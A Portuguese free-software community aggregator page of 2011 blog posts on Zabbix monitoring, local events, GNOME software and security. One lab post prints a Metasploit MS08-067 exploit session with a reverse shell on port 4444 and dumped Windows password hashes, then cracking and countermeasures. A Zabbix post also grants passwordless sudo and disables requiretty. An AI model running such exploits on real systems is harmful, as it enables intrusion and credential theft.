O Projeto Software Livre Bahia (PSL-BA) é um movimento aberto que busca, através da força cooperativa, disseminar na esfera estadual os ideais de liberdade difundidos pela Fundação Software Livre (FSF), possibilitando assim a democratização do acesso a informação, através dos recursos oferecidos pelo Software Livre. Esta busca tem seus alicerces fundados na colaboração de todos, formando um movimento sinérgico que converge na efetivação dos ideais de Liberdade, Igualdade, Cooperação e Fraternidade.
O Projeto Software Live Bahia é formado pela articulação de indivíduos que atuam em instituições publicas e privadas, empresas, governos ou ONGs, e demais setores da sociedade. Além disso o projeto não é subordinado a qualquer entidade ou grupo social, e não estabelece nenhuma hierarquia formal na sua estrutura interna.
Alexandro Silva: Dicas de medidas preventivas contra técnicas avançadas de evasão
31 de Março de 2011, 0:00 - sem comentários ainda
As técnicas de invasão estão evoluindo diariamente tornando-se cada vez mais sofisticadas e de dificil detecção, principalmente porque as cooporações negligenciam uso de boas práticas.
As principais ferramentas do mercado, sejam elas proprietárias ou livres, dispõem de opções evasivas avançadas que dificultam a detecção de um ataque.
Algumas ações podem ser aplicadas como medida de prevenção contra técnicas avançadas de evasão ( TAE ):
1 – As TAEs diferem das ações evasivas tradicionais. É importante entender que elas não são ataques e sim formas de ocultar de um IPS ou firewall a exploração de uma vulnerabilidade, por isso é necessário entender seu funcionamento e as medidas de proteção.2 – Auditar constantemente a infraestrutura localizando vulnerabilidades e analisar e mitigar os riscos.
3 – Monitorar a atualização ( patchs ) de todos os sistemas constantemente. Os ataques só ocorrem quando existem vulnerabilidades para serem exploradas.
4 – Avaliar se as soluções de firewall e IPS estão preparadas para proteger a infraestrutura contra estas técnicas.
5 – Implantar uma gerência de segurança centralizada. A descentralização e a falta de uma gerência efetiva e pró-ativa dos dispositivos de segurança permitem que TAEs sejam aplicadas com sucesso garantido nos resultados.
6 – Simular ataques ( pen-testing ) usando estas técnicas no ambiente “real” com o objetivo de detectar o nível de proteção que os atuais dispositivos de segurança adotados na empresa podem propocionar.
A adoção destas medidas permite ampliar o conhecimento sobre o quanto sua infraestrutura de segurança está preparada para proteger seus ativos. O bom senso, conhecimento e cultura de segurança devem ser premissas básicas no dia a dia dos profissionais que são responsáveis pela salva-guarda dos ativos de uma empresa.
Fonte – Help Net Security
See:
- Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack
- Inimigos da segurança da informação – Meliante 3
- Protegendo seu WebServer contra o Slowloris HTTP DoS
- Usando o http-wp-plugins do Nmap para detectar plugins do WordPress
- Infraestrutura para Aplicações Web Seguras – Motivação
JavaBahia: IIIº encontro nas universidades
30 de Março de 2011, 0:00 - sem comentários aindaData: 5 de abril (terça-feira)hora: 19:00
Local: Prédio de Aulas 5, Unifacs Imbui
Entrada: Gratuita
Palestra GoogleMaps API-
Palestrante: Luciano Borges
Mini-currículo: Mestrando em Sistemas de Computação pela Unifacs, analista de desenvolvimento do SERPRO e professor da Faculdade Hélio Rocha. Experiência em desenvolvimento de sistemas web, tendo atuado de programador a gerente de projetos nas empresas em que atuou. Entusiasta dos temas: sistemas web, sistemas de informações geográficas nas web (sigweb) e ruby on rail.
Palestra: Coding Dojo com Python-
Palestrante: Luiz Cláudio Silva
Mini-currículo: Formado em Processamento de Dados, especialista em Redes de Computadores e mestrando em Modelagem Computacional. Atualmente é Assessor do IEL/BA. Trabalha com desenvolvimento e administração de sistemas desde 1996, tendo usado diversas linguagens e metodologias. É membro dos grupos Python Bahia e LinguÁgil.
inscrições: http://www.jugevents.org/jugevents/event/show.html?id=36408
Evento anterior: http://javabahia.blogspot.com/2011/03/ii-javabahia-nas-univerisadades-2011.html
Rafael Gomes: Lançamento do Zabbix 1.9.3 Alpha
30 de Março de 2011, 0:00 - sem comentários aindaContinuando o ritmo de novidades dessa ótima ferramenta de monitoramento, a equipe do Zabbix lança sua nova versão, ainda em alpha, para a comunidade.
Zabbix é uma solução, de código aberto, de monitoramento distribuído de ativos. Um software de alto nível, muito utilizado no mercado corporativo. Ele é liberado sob a GPL, portanto, é gratuito tanto para uso comercial e não comercial. O texto completo da licença está disponível em http://www.gnu.org/copyleft/gpl.txt.
Segue abaixo as novidades:
:: Monitoramento JMX remoto
Essa opção permite monitorar nativamente, com segurança, e remotamente aplicações java e populares middlewares, tal como JBoss, WebSphere e WebLogic.
:: Tipo de dados booleano
Tipo de dados booleanos pode ser usado para monitoramento de duas métricas e contadores JMX, que tem tipo booleano.
:: Novo pacote de ícones
Novo mapa de ícones está disponível para deixar seus mapas mais elegantes e bonitos.
:: Suporte a novos macros
Adicionado suporte para macros {IPADDRESS}, {HOST.DNS} e {HOST.CONN}.
:: Múltiplas interfaces de rede
Múltiplas interface de rede pode ser configuradas em apenas um host, portanto um host pode ter diversos endereços IP com diferentes checagens por IP.
:: Melhora no framework de tradução para interface WEB
Traduções da interface do Zabbix são manipuladas pelo módulo GNU gettext.
:: Auto-registro com checagem passiva
Adicionado o suporte de monitoramento para auto-registro, com checagem passiva. Isso é muito usado para monitoria de ambientes em nuvem.
:: Ajuste de eventos e triggers de status desconhecido
Triggers e eventos em estado desconhecido não serão exibidos pela interface web, uma sinalização especial será exibida em em seu lugar.
:: Legendas opcionais do gráfico
Legendas do gráfico pode ser opcionalmente desabilitado.
:: Customização da severidade das triggers
As triggers padrões agora podem ser customizadas, com nomes e cores diferentes.
:: Nova tela de login
A tela de login foi refeita e agora está mais bonita.
:: Novo formulário para configuração de ações
O novo formulário, com separações claras de parâmetros gerais, condições e ações.
:: Exportar os eventos para CSV
Eventos disponíveis no Zabbix agora podem ser exportados para o formato CSV em apenas um clique.
:: Suporte a SQLite3 no servidor Zabbix
SQLite3 agora pode ser usado no servidor Zabbix e trabalha também com a interface WEB. Ótima notícia para ambientes simples.
Gostou? Quer usar? Lembre-se que esse software NÃO é aconselhável para ambientes de produção, ou seja, faça por sua conta em risco.
Veja nesse link como instalar ou atualizar o ser Zabbix.
Fonte – Zabbix.com
Rafael Gomes: Monitorando o MySQL com o Zabbix
30 de Março de 2011, 0:00 - sem comentários aindaSeguindo os posts sobre Zabbix, irei explicar agora como monitoramos a capacidade do SGBD MySQL com o Zabbix.
Nos continuaremos a utilizar o UserParameter, que já foi explicado nesse post.
Primeiro vamos criar um usuário simples para que possa ser utilizado nas consultas ao banco MySQL:
# mysql -u root -p
mysql> CREATE USER 'monitor'@'localhost';
mysql> exit
Pronto, agora já criamos um usuário simples para a monitoria.
Agora adicione as linhas abaixo no final do arquivo /etc/zabbix/zabbix_agentd.conf :
## MySQL
UserParameter=user.mysql.ping,mysqladmin -umonitor ping|grep alive|wc -l
UserParameter=user.mysql.uptime,mysqladmin -umonitor status|cut -f2 -d":"|cut -f1 -d"T" | awk '{print $1}'
UserParameter=user.mysql.threads,mysqladmin -umonitor status|cut -f3 -d":"|cut -f1 -d"Q" | awk '{print $1}'
UserParameter=user.mysql.questions,mysqladmin -umonitor status|cut -f4 -d":"|cut -f1 -d"S" | awk '{print $1}'
UserParameter=user.mysql.slowqueries,mysqladmin -umonitor status|cut -f5 -d":"|cut -f1 -d"O" | awk '{print $1}'
UserParameter=user.mysql.opentables,mysqladmin -umonitor status|cut -f8 -d":" |cut -f2 -d" "
UserParameter=user.mysql.qps,mysqladmin -umonitor status|cut -f9 -d":" |cut -f2 -d" "
Pronto, agora basta que você configure os itens no servidor Zabbix e aguarde a nova coleta.
Alexandro Silva: Cibercrime: EaaS ( exploit-as-a-service )
30 de Março de 2011, 0:00 - sem comentários aindaOs cibercriminosos inauguram mais uma fase da evolução do SaaS: além de disponibilizarem conjuntos de ferramentas de exploração de vulnerabilidades de sites, associam serviços de hospedagem. É o “exploit-as-a-service”. Os clientes pagam pelo período de tempo em que as iniciativas estão infectando ativamente os computadores.
Os conjuntos de ferramentas oferecem vários tipos de “exploits”, ou seja, sequências de códigos capazes de permitir ao usuário tirar partido de vulnerabilidades de software, para introduzir malware em um sistema. Investigadores da Seculert descobriram que pelo menos um par desses conjuntos ou kits – Incognito 2.0 e Bomba – oferecem os seus próprios serviços de alojamento na web – assim como uma interface de gestão acessível pela internet.
O novo modelo de negócio torna mais fácil a vida dos cibercriminosos ou operadores com problemas em garantir a robustez do alojamento de servidores com malware, disse Aviv Raff, CTO e co-fundador da Seculert. A empresa especializou-se no serviço baseado em cloud computing que alerta os seus clientes para novos fenômenos de malware, vulnerabilidades e outras ameaças virtuais.
O conjunto de ferramentas descoberto destina-se a criminosos interessados em atacar um grande número de computadores com Microsoft Windows. Uma vez violada a segurança dos computadores, as máquinas podem ser usadas para roubar dados pessoais, enviar spam, e realizar ataques de negação de serviço…
Leia mais em IDG Now – Segurança
See:
Serge Rehem: Entrevista à Rádio Serpro sobre Colaboração
30 de Março de 2011, 0:00 - sem comentários aindaSemana passada fiquei muito honrado ao ser convidado pela Rádio Serpro para uma entrevista sobre colaboração. Foram mais de 40 minutos de conversa, que deverão ser editados em até 5. Vai dar trabalho, acho :D
No podcast abaixo, disponibilizo o papo na íntegra. Falo um pouco sobre o aprendizado que venho adquirindo, praticando e compartilhando neste blog, passando por vários tópicos: colaboração x compartilhamento, aspectos técnico e emocionais da colaboração, coexistencia de competição e colaboração, cultura de colaboração, atitudes individuais + gestão + estruturas organizacionais, web 2.0, trabalho cooperado no serpro, uso de metodologias ágeis, dentre outros.
Lucas Almeida Rocha: The Board in the Summer
29 de Março de 2011, 0:00 - sem comentários aindaAs you probably know by now, GNOME has been accepted as a mentoring organization in Google’s Summer of Code 2011. Student applications period started yesterday! If you’re a student excited about GNOME, have a look at our wiki page for more information and project ideas! Application period ends on April 8.
This year I decided to mentor one project related to The Board. The idea is to implement a Tracker storage for the app. Using Tracker will allow us to implement smart searches in the app itself and expose The Board’s data to other desktop components.
So, if you’re a student looking for an interesting project to hack on as part of the Summer of Code this year, this is an exciting opportunity to work on a cool app using bleeding edge GNOME technologies (Clutter, GTK+ 3, Gjs, Tracker, etc).
Alexandro Silva: Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack
29 de Março de 2011, 0:00 - sem comentários aindaQuando o assunto é payload o Meterpreter é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.
Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.
Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Ophcrack. O Ophcrack é um password cracker multiplataforma livre baseado em rainbow tables para quebra de senha de sistemas Windows.
Existem tables gratuitas no site da ferramenta, porém a tables especiais são encontradas no lado negro da força.
Vamos aos testes
Iniciando um conexão com o Meterpreter e obtendo o dump de senhas
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 11.11.11.11:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 11.11.11.11
[*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011
meterpreter > hashdump
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:9ccce0e593125118ac7357e105e50589:::
Com o hash em mão é hora do Ophcrack fazer o trabalho sujo!
Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.
Contramedidas
Use as seguintes medidas preventivas contra este tipo de ataque:
1 – Use senhas complexas;
2 – Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );
3 – Mantenha seu sistema atualizado;
4 – Mantenha o firewall local ativado;
5 – Use sistemas de proteção robustos e com checagem em tempo real da memória;
6 – Se você não está afim de gastar ( item 5 ) então utilize o MSE ( Microsoft Security Essentials ) juntamente com um firewall pessoal.
Mais informações:
Frequently Asked Questions about Passwords and Password Attacks
See:
JavaBahia: II javaBahia nas universidades 2011: saiba como foi
29 de Março de 2011, 0:00 - sem comentários aindaO evento foi muito bom e com um ótimo público. Agradecimento aos professores, alunos e toda Organização da FIB.
Fotos:
Find more photos like this on Open Source University Meetup
Videos:
Apresentações:
Rafael Gomes: Monitorando o OpenLDAP com o Zabbix
28 de Março de 2011, 0:00 - sem comentários aindaNo post anterior, eu demonstrei como podemos monitorar uma infinidade de itens no agente, usando a sintaxe UserParameter, e utilizei como exemplo a monitoria do Asterisk.
Hoje irei demonstrar como podemos monitorar a capacidade do OpenLDAP.
Acesse o arquivo /etc/openldap/slapd.conf e adicione abaixo da sua sintaxe database atual as seguintes linhas:
database monitor
access to dn.subtree="cn=Monitor"
by dn.exact="uid=monitor,ou=Users,dc=dominio,dc=net,dc=br" read
by * none
Com a sintaxe access eu restringi o acesso a essa base de monitor apenas para o usuário monitor, ou seja, não esqueça de criar esse usuário em sua base LDAP.
Salve o arquivo e reinicie o serviço do openldap.
Para configurar a monitoria do OpenLDAP no agente, acesse o arquivo /etc/zabbix/zabbix_agentd.conf e adicione as seguintes linhas:
## OPENLDAP
# Monitorar conexões ativas do OpenLDAP
UserParameter=user.openldap.current.conections,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Current,cn=Connections,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorCounter:" | awk '{print $2}'
# Monitorar adições na base do OpenLDAP
UserParameter=user.openldap.add.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Add,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.add.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Add,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'
# Monitorar adições na base do OpenLDAP
UserParameter=user.openldap.delete.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Delete,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.delete.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Delete,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'
# Monitorar buscas na base do OpenLDAP
UserParameter=user.openldap.search.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Search,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.search.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Search,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'
# Monitorar bind na base do OpenLDAP
UserParameter=user.openldap.bind.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Bind,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.bind.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Bind,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'
# Monitorar Abandon na base do OpenLDAP
UserParameter=user.openldap.abandon.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Abandon,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.abandon.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Abandon,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'
# Monitorar Modify na base do OpenLDAP
UserParameter=user.openldap.modify.completed,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Modify,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpCompleted:" | awk '{print $2}'
UserParameter=user.openldap.modify.initiated,ldapsearch -x -D ' uid=monitor,ou=Users,dc=dominio,dc=net,dc=br' -w suasenha -b 'cn=Modify,cn=Operations,cn=Monitor' -s base '(objectClass=*)' '*' '+' | grep "monitorOpInitiated:" | awk '{print $2}'
Salve o arquivo e reinicie o serviço do zabbix-agent.
Acredito que quem gerencia um OpenLDAP, conhece o comando ldapsearch e não entrarei no detalhe desse comando aqui. Caso precise de documentação, acesse esse link.
Agora basta configurar os itens no servidor Zabbix e aguardar a nova coleta dos dados.
JavaBahia: II javaBahia nas univerisadades 2011 como foi
28 de Março de 2011, 0:00 - sem comentários aindaO evento foi muito, e com um bom número de público um agradecimento aos professores, alunos e toda Organização da FIB.
Fotos:
Find more photos like this on Open Source University Meetup
Videos:
Apresentações:
Lucas Almeida Rocha: The Board 0.1.2
28 de Março de 2011, 0:00 - sem comentários aindaIt turns out that The Board‘s distro packages were a great success! The PPA package alone has been downloaded more then 330 times in just a week. Not bad for package only available for an unreleased version of Ubuntu. And I’m not even counting the implicit testers using the GNOME 3 live image. I’ve got some useful feedback from early testers and I expect get even more from now on.
I was planning to finish some new major features before releasing 0.1.2, but a serious crash has been reported and I felt I had to respond to it quickly to avoid losing early testers. So, I give you The Board 0.1.2!
Besides the crash fix, this release contains a few nice improvements and bug fixes such as the addition of keyboard shortcuts for aligning and distributing elements on the page, more subtle window dimming when an element is activated, and proper saving when multiple elements are dragged. Major features such as Cheese integration are probably coming as part of the next release.
I’ve already pushed the updates to The Board’s PPA. If you already have it in your sources list, you should get it in the next few hours. I expect openSUSE and Fedora packages to be updated soon. If you haven’t tried The Board yet, what are you waiting for? Follow the instructions from my last blog post and start testing a few minutes!
Alexandro Silva: Meterpreter: VNC Crack Contramedidas
28 de Março de 2011, 0:00 - sem comentários aindaSeguem algumas recomendações de como se previnir contra o ataque de VNC Password Cracking usando o módulo enum_vnc_passwd do MSF Meterpreter.
0 – Use senhas complexas;
1 – Bloqueie todos os acessos externos usando o firewall do Windows ou do seu Antivírus, se existir este recurso é claro. Para quem usa Linux recomendo o Firestarter;
2 – Crie uma regra permitindo somente o acesso as portas TCP 5900/5800 através de seu ip externo. Por exemplo se você acessa sua máquina do trabalho libere o acesso apenas para o ip do NAT ( 200.x.x.x );
3 – Configure uma VPN;
4 – Altere as portas padrões do VNC;
5 – Não use VNC. ;-P
OBS: Para mim a opção 03 é a mais recomendada.
See:
Wille Marcel: Participe do Flisol 2011 – Cruz das Almas
28 de Março de 2011, 0:00 - sem comentários aindaEstou na organização do Flisol 2011, em Cruz das Almas/BA. O evento será realizado dia 09 de Abril a partir das 09h, no Pavilhão de Aulas 1 do Campus da UFRB. Na programação, teremos algumas palestras, oficinas, instalação e distribuição de softwares livres.
As palestras já confirmadas são as seguintes:
- O que é Software Livre e por que utilizar? – Wille Marcel
- Desenvolvimento de Sites com CMS – César Velame
- Interfaces multitoques em ambientes livres – Luís Paulo Colombiano
- Ekaaty Linux – Nadilson dos Santos de Santana
Além disso, Aurélio Heckert e Valéssio Brito vão apresentar duas palestras sobre Arte com Softwares Livres, participe da escolha dos temas, votando na enquete no site http://www.ufrb.edu.br/flisol.
O FLISOL (Festival Latinoamericano de Instalação de Software Livre) é o maior evento de divulgação de Software Livre da América Latina. Ele acontece desde 2005 e seu principal objetivo é promover o uso de software livre, apresentando sua filosofia, seu alcance, avanços e desenvolvimento ao público em geral. Além de Cruz das Almas, o evento será realizado, no mesmo dia, em centenas de cidades de toda a América Latina. Confira se haverá Flisol na sua cidade no site oficial.
Baixe o cartaz em PDF, imprima e ajude a divulgar o evento.
Rafael Gomes: Monitorando ligações ativas do Asterisk usando Zabbix
27 de Março de 2011, 0:00 - sem comentários aindaComo havia informado, há muito tempo atrás, nesse post, eu comecei a utilizar a ferramenta de monitoramento chamada Zabbix e desse momento até então não consigo encontrar ferramenta melhor.
Estou montando uma nova central de monitoramento, no meu novo emprego, e me deparo com uma central de telefonia Voip Asterisk.
Após uma pesquisa rápida, descobri que o comando abaixo informa as ligações ativas no Asterisk, ou seja, quem já usa Zabbix já sabe como monitorar isso certo?
/usr/sbin/asterisk -rvvvvvx 'core show channels'
Caso não seja experiente no Zabbix não se desespere. Irei explicar passo a passo.
O agente do Zabbix tem uma opção chamada UserParameter. Essa opção serve para especificarmos monitoria local, ou seja, com essa opção é possível monitorar TUDO no sistema que tem o agente instalado.
Parece propaganda de telemarketing não é? mas é verdade.
A sintaxe do UserParameter é composto por:
UserParameter=<chave.que.sera.usada.no.zabbix.server>,<comando que será executado pelo usuário zabbix no agente>
Exemplo:
UserParameter=test.echo,echo “1″
Ou seja, quando você configurar no Zabbix server a key test.echo para esse agente, receberá o valor 1. Entendeu?
Vamos agora para o exemplo prático,
Acesse o arquivo /etc/zabbix/zabbix_agentd.conf e adicione a seguinte linha:
UserParameter=user.asterisk.active.calls,sudo /usr/sbin/asterisk -rvvvvvx 'core show channels' | grep "active calls" | awk '{print $1}'
Agora acesse o arquivo /etc/sudoers e adicione a seguinte linha:
zabbix ALL=NOPASSWD:/usr/sbin/asterisk
Nesse mesmo arquivo comente a seguinte linha:
Defaults requiretty
Pronto! Agora reinicie o serviço do agente Zabbix, configure a sua chave no servidor Zabbix e divirta-se.